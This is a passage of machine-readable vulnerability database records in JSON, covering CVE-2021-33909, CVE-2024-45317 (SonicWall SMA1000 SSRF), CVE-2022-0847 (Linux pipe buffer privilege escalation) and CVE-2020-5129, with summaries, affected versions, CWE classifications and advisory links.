        "url": "https://github.com/liang2580/cve-2021-33909 "
      },
      {
        "title": "cve-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/baerwolf/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/bbinfosec43/cve-2021-33909 "
      },
      {
        "title": "deep-directory",
        "trust": 0.1,
        "url": "https://github.com/sfowl/deep-directory "
      },
      {
        "title": "integer_compilation_flags",
        "trust": 0.1,
        "url": "https://github.com/mdulin2/integer_compilation_flags "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/alaial90/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/christhecoolhut/cve-2021-33909 "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/knewbury01/codeql-workshop-integer-conversion "
      },
      {
        "title": "kickstart-rhel8",
        "trust": 0.1,
        "url": "https://github.com/alexhaydock/kickstart-rhel8 "
      },
      {
        "title": "exploit_articles",
        "trust": 0.1,
        "url": "https://github.com/chokyuwon/exploit_articles "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/hardenedvault/ved "
      },
      {
        "title": "SVG-advisories",
        "trust": 0.1,
        "url": "https://github.com/egi-federation/svg-advisories "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/makoto56/penetration-suite-toolkit "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-190",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-787",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/163621/sequoia-a-deep-root-in-linuxs-filesystem-layer.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/163671/kernel-live-patch-security-notice-lsn-0079-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/164155/kernel-live-patch-security-notice-lsn-0081-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/165477/kernel-live-patch-security-notice-lsn-0083-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/07/22/7"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/08/25/10"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/17/2"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/17/4"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/21/1"
      },
      {
        "trust": 1.0,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.13.4"
      },
      {
        "trust": 1.0,
        "url": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/z4uhhigiso3fvrf4cqnjs4ika25atsfu/"
      },
      {
        "trust": 1.0,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2022-0015"
      },
      {
        "trust": 1.0,
        "url": "https://security.netapp.com/advisory/ntap-20210819-0004/"
      },
      {
        "trust": 1.0,
        "url": "https://www.debian.org/security/2021/dsa-4941"
      },
      {
        "trust": 1.0,
        "url": "https://www.openwall.com/lists/oss-security/2021/07/20/1"
      },
      {
        "trust": 1.0,
        "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
      },
      {
        "trust": 0.8,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2021-33909"
      },
      {
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-006"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-33034"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2723"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5014-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1014.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-25.27"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1015.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.3/5.3.0-1045.48"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2-5.3/5.3.0-1042.44"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1013.14"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.3.0-76.72"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1014.15"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3347"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3347"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2731"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2728"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2725"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2737"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2734"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33910"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33910"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2763"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21419"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28500"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15112"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25737"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.8/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21639"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7774"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20291"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28092"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3520"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-26540"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3537"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23368"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3518"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21419"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23337"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33194"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32399"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-26539"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15106"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29059"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3516"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25735"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2183"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23368"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26160"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21623"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2438"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15112"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23337"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25735"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22133"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15113"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21640"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26160"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21640"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7774"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2437"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15136"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3517"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28852"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23382"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21623"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21639"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21648"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15106"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29622"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21648"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20291"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28500"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15113"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27292"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22133"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3114"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23382"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3636"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3653"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3656"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      }
    ],
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-07-20T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "date": "2021-07-21T16:03:37",
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "date": "2021-07-21T16:04:17",
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "date": "2021-07-21T16:04:59",
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "date": "2021-07-21T16:05:35",
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "date": "2021-07-21T16:06:02",
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "date": "2021-07-21T16:07:24",
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "date": "2021-07-20T20:34:00",
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "date": "2021-07-27T14:47:55",
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "date": "2021-07-28T14:53:49",
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "date": "2021-09-14T16:28:49",
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "date": "2021-07-20T19:15:09.747000",
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "date": "2023-11-07T03:35:56.050000",
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163595"
      }
    ],
    "trust": 0.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat Security Advisory 2021-2723-01",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163590"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163595"
      }
    ],
    "trust": 0.1
  }
}

cve-2024-45317
Vulnerability from cvelistv5
Published
2024-10-11 08:30
Modified
2024-10-11 15:06
Severity ?
Summary
A Server-Side Request Forgery (SSRF) vulnerability in SMA1000 appliance firmware versions 12.4.3-02676 and earlier allows a remote, unauthenticated attacker to cause the SMA1000 server-side application to make requests to an unintended IP address.
Impacted products
SonicWallSMA1000
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:sonicwall:sma1000_firmware:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "sma1000_firmware",
            "vendor": "sonicwall",
            "versions": [
              {
                "lessThan": "12.4.3-02676",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-45317",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-11T15:04:24.917758Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-11T15:06:10.975Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unknown",
          "platforms": [
            "Linux"
          ],
          "product": "SMA1000",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "12.4.3-02676 and earlier versions"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "value": "Wenjie Zhong (H4lo) of Webin DBappSecurity Co., Ltd."
        }
      ],
      "datePublic": "2024-10-11T08:21:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "A Server-Side Request Forgery (SSRF) vulnerability in SMA1000 appliance firmware versions 12.4.3-02676 and earlier allows a remote, unauthenticated attacker \u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eto cause the SMA1000 server-side application to make requests to an unintended IP address.\u003c/span\u003e"
            }
          ],
          "value": "A Server-Side Request Forgery (SSRF) vulnerability in SMA1000 appliance firmware versions 12.4.3-02676 and earlier allows a remote, unauthenticated attacker to cause the SMA1000 server-side application to make requests to an unintended IP address."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918 Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-10-11T08:30:23.707Z",
        "orgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
        "shortName": "sonicwall"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0017"
        }
      ],
      "source": {
        "advisory": "SNWLID-2024-0017",
        "discovery": "EXTERNAL"
      },
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
    "assignerShortName": "sonicwall",
    "cveId": "CVE-2024-45317",
    "datePublished": "2024-10-11T08:30:23.707Z",
    "dateReserved": "2024-08-26T20:20:45.693Z",
    "dateUpdated": "2024-10-11T15:06:10.975Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-0847
Vulnerability from cvelistv5
Published
2022-03-07 00:00
Modified
2024-08-02 23:40
Severity ?
Summary
A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.
Impacted products
n/akernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:40:04.513Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060795"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://dirtypipe.cm4all.com/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/166230/Dirty-Pipe-SUID-Binary-Hijack-Privilege-Escalation.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/166229/Dirty-Pipe-Linux-Privilege-Escalation.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/166258/Dirty-Pipe-Local-Privilege-Escalation.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.suse.com/support/kb/doc/?id=000020603"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220325-0005/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/176534/Linux-4.20-KTLS-Read-Only-Write.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Linux Kernel 5.17 rc6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A flaw was found in the way the \"flags\" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-665",
              "description": "CWE-665-\u003eCWE-281",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-01-12T16:06:14.073682",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060795"
        },
        {
          "url": "https://dirtypipe.cm4all.com/"
        },
        {
          "url": "http://packetstormsecurity.com/files/166230/Dirty-Pipe-SUID-Binary-Hijack-Privilege-Escalation.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/166229/Dirty-Pipe-Linux-Privilege-Escalation.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/166258/Dirty-Pipe-Local-Privilege-Escalation.html"
        },
        {
          "url": "https://www.suse.com/support/kb/doc/?id=000020603"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20220325-0005/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf"
        },
        {
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015"
        },
        {
          "url": "http://packetstormsecurity.com/files/176534/Linux-4.20-KTLS-Read-Only-Write.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2022-0847",
    "datePublished": "2022-03-07T00:00:00",
    "dateReserved": "2022-03-03T00:00:00",
    "dateUpdated": "2024-08-02T23:40:04.513Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2020-5129
Vulnerability from cvelistv5
Published
2020-03-26 03:35
Modified
2024-08-04 08:22
Severity ?
Summary
A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause HTTP server crash which leads to Denial of Service. This vulnerability affected SMA1000 Version 12.1.0-06411 and earlier.
References
Impacted products
SonicWallSMA1000
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T08:22:08.523Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0002"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SMA1000",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "12.1.0-06411 and earlier"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause HTTP server crash which leads to Denial of Service. This vulnerability affected SMA1000 Version 12.1.0-06411 and earlier."
        }
      ],
